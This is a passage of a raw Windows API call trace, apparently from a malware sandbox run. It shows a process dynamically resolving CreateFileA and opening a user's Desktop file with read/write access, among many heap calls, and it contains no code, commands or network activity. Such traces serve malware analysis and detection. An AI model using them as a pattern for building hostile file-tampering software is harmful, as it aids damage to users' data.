hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.584] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.584] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.584] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.584] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e5a0 [0076.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e5a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.584] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.584] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5a0 [0076.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e5a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.585] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0076.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0076.585] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3b) returned 0x74b420 [0076.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", cchWideChar=59, lpMultiByteStr=0x74b420, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpUsedDefaultChar=0x0) returned 59 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.585] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.586] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.586] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x76) returned 0x660098 [0076.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=59, lpWideCharStr=0x660098, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi") returned 59 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x660098 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0076.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.589] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.590] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0076.591] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.592] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e630 [0076.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.593] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.593] CloseHandle (hObject=0x140) returned 1 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.593] HeapFree (in: 